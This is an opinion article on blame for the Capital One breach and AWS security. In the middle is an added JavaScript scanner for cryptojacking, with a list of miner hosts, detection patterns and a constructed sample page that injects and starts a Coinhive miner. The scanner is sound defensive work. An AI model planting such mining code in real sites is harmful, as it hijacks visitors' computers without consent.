Is post-Capital One breach criticism of Amazon fair?

The recent Capital One data breach, allegedly perpetrated by a single American hacker from the Pacific Northwest named Paige A. Thompson, is just the latest in a long line of intrusions that have exposed weaknesses in systems running on perhaps the largest systems business in the world, Amazon Web Services.

It has been widely speculated that Thompson's time as an Amazon employee gave her insider knowledge that helped her pull off such a massive crime. AWS, through its spokesman Grant Milne, maintains that the “vulnerability is not specific to the cloud” and that its systems were not compromised as part of the hack; in AWS's telling, the weakness lay in the configuration of a web application firewall deployed by the customer, not in the cloud platform beneath it.

Amazon Web Services, with the many services it delivers to millions of customers on its public cloud, now boasts an annualized run rate of over $30 billion. Hundreds of millions of internet users interact with AWS in one capacity or another every day.

The Capital One hack was particularly sensational because of the sensitivity of the information taken and the sheer number of people affected. The credit limits, credit scores, payment histories, contact information and available balances of more than 100 million Americans and roughly six million Canadians are now thought to be circulating on the black market of the so-called “Dark Web.”

AWS and Amazon CEO Jeff Bezos have a major problem. Everyone from this writer to several U.S. government departments and agencies to the National Enquirer (the same National Enquirer that Bezos accused of trying to extort and blackmail him) appears to host websites and other cloud workloads on the servers of AWS.

It has become a point of contention in Washington as lawmakers demand answers. Last week, Oregon's senior senator, Democrat Ron Wyden, sent a letter to Bezos asking Amazon to explain its role in the hack and whether vulnerabilities in the company's cloud services had anything to do with it.

This came on the heels of the previous week's letters from the House Oversight Committee, addressed to both Amazon Web Services and Capital One, requesting a full briefing on the incident and more details on the companies' security protocols. In the Amazon letter, the lawmakers cited the pending JEDI award, a 10-year, $10 billion Joint Enterprise Defense Infrastructure contract that may be awarded to either AWS or Microsoft, writing that “the Committee may carefully examine the consequences of this breach.”

While it's easy to pick on Bezos and Amazon over this, the incident speaks to a larger problem for providers of web hosting and cloud services. Just last February, a wave of cryptojacking hit hundreds of well-trafficked websites hosted on AWS.

Cryptojacking is the planting of JavaScript on a website so that the browser of every visitor quietly mines cryptocurrency on the attacker's behalf, using the visitor's CPU for as long as the page stays open. It is particularly insidious in that, unlike typical malware and ransomware infections that announce themselves, cryptojacking often goes unnoticed: the victim sees only a sluggish machine and a hot, loud CPU, and an organization with many affected machines may notice nothing until its electricity bill shows a major usage spike.
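As an added illustration of how a site operator might spot the kind of injected mining script described above (this is example code written for this page, not code from the article or from any of the affected sites), the following heuristic scanner pulls every script tag out of a page and flags external scripts from hosts associated with in-browser miners, inline code that constructs and starts a miner, and third-party scripts loaded without Subresource Integrity. The host list, the source patterns and the sample page are illustrative assumptions constructed for the example, not a maintained threat feed or a capture from a real site.

```javascript
// Added example, not from the original article. All inputs are constructed.
// The indicator lists are assumptions for illustration, not an authoritative feed.

// Hosts historically associated with in-browser miners (assumed, illustrative list).
const MINER_HOSTS = ["coinhive.com", "coin-hive.com", "crypto-loot.com"];

// Source-level indicators: a miner object being constructed and started, plus the
// WebAssembly + Worker combination browser miners rely on. Any single pattern is
// weak on its own, so a script must hit at least two to be flagged.
const MINER_SOURCE_PATTERNS = [
  /CoinHive\.Anonymous/i,
  /\.start\(\s*\)/,
  /WebAssembly\.instantiate/,
  /new\s+Worker\s*\(/,
];

// Pull every <script> tag out of a page. A regex is adequate for the static,
// constructed HTML used here; production tooling should use a real HTML parser.
function extractScripts(html) {
  const scripts = [];
  const re = /<script\b([^>]*)>([\s\S]*?)<\/script>/gi;
  let m;
  while ((m = re.exec(html)) !== null) {
    const attrs = m[1];
    const srcMatch = /\bsrc\s*=\s*["']([^"']+)["']/i.exec(attrs);
    const integrity = /\bintegrity\s*=/i.test(attrs);
    scripts.push({ src: srcMatch ? srcMatch[1] : null, body: m[2], integrity });
  }
  return scripts;
}

// Hostname of an absolute or protocol-relative script URL; "" for first-party paths.
function hostOf(src) {
  if (!/^(https?:)?\/\//i.test(src)) return "";
  try {
    return new URL(src, "https://localhost/").hostname.toLowerCase();
  } catch (e) {
    return "";
  }
}

// Return the suspicious scripts on a page together with the reasons for each.
function scanForCryptojacking(html) {
  const findings = [];
  for (const s of extractScripts(html)) {
    const reasons = [];
    if (s.src) {
      const host = hostOf(s.src);
      if (MINER_HOSTS.some(h => host === h || host.endsWith("." + h))) {
        reasons.push(`external script from known miner host ${host}`);
      }
      // Third-party code without Subresource Integrity can be swapped out upstream
      // without the site operator noticing, which is how a miner gets injected.
      if (host && !s.integrity) {
        reasons.push("third-party script loaded without integrity attribute");
      }
    }
    const hits = MINER_SOURCE_PATTERNS.filter(p => p.test(s.body)).length;
    if (hits >= 2) reasons.push(`inline source matches ${hits} miner indicators`);
    if (reasons.length) findings.push({ src: s.src, reasons });
  }
  return findings;
}

// Constructed sample page (not captured from any real site): one first-party script,
// one pinned third-party library, and one injected miner loader plus its inline starter.
// 'SITEKEY' is a placeholder.
const SAMPLE_PAGE = `
<html><head>
<script src="/static/app.js"></script>
<script src="https://cdn.example.org/lib.js" integrity="sha384-AAAA"></script>
<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script>
  var miner = new CoinHive.Anonymous('SITEKEY');
  miner.start();
</script>
</head><body></body></html>`;

console.log(JSON.stringify(scanForCryptojacking(SAMPLE_PAGE), null, 2));
```

Run against the sample page, the scanner reports two findings: the external loader (known miner host, no integrity attribute) and the inline script that instantiates and starts the miner, while the first-party script and the pinned library pass. The missing-integrity check is deliberately reported even without a miner indicator, because an unpinned third-party script is exactly the foothold the February incident exploited.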

According to Digiconomist, processing a single Bitcoin transaction requires approximately 215 kilowatt-hours (kWh), roughly one week's usage for the average family; American households consume around 901 kWh per month on average.

Hacks like the Capital One incident inspire fear and finger-pointing among legislators who are mostly ignorant of cloud security and of cybersecurity in general. They tend to attack the top players like Bezos while failing to realize that many attacks result from human error rather than from system flaws. One example is the recent malware attack against three American utility providers, carried out through a spear-phishing campaign that infected the companies with LookBack malware. It is further proof that it is next to impossible to build an impenetrable system, regardless of the money or manpower invested.

Government entities and the private sector would all benefit more from a proactive and communal approach to these matters, which can affect hundreds of millions of online Americans at any moment, than from grandstanding and blame shifting to satisfy their own vanity.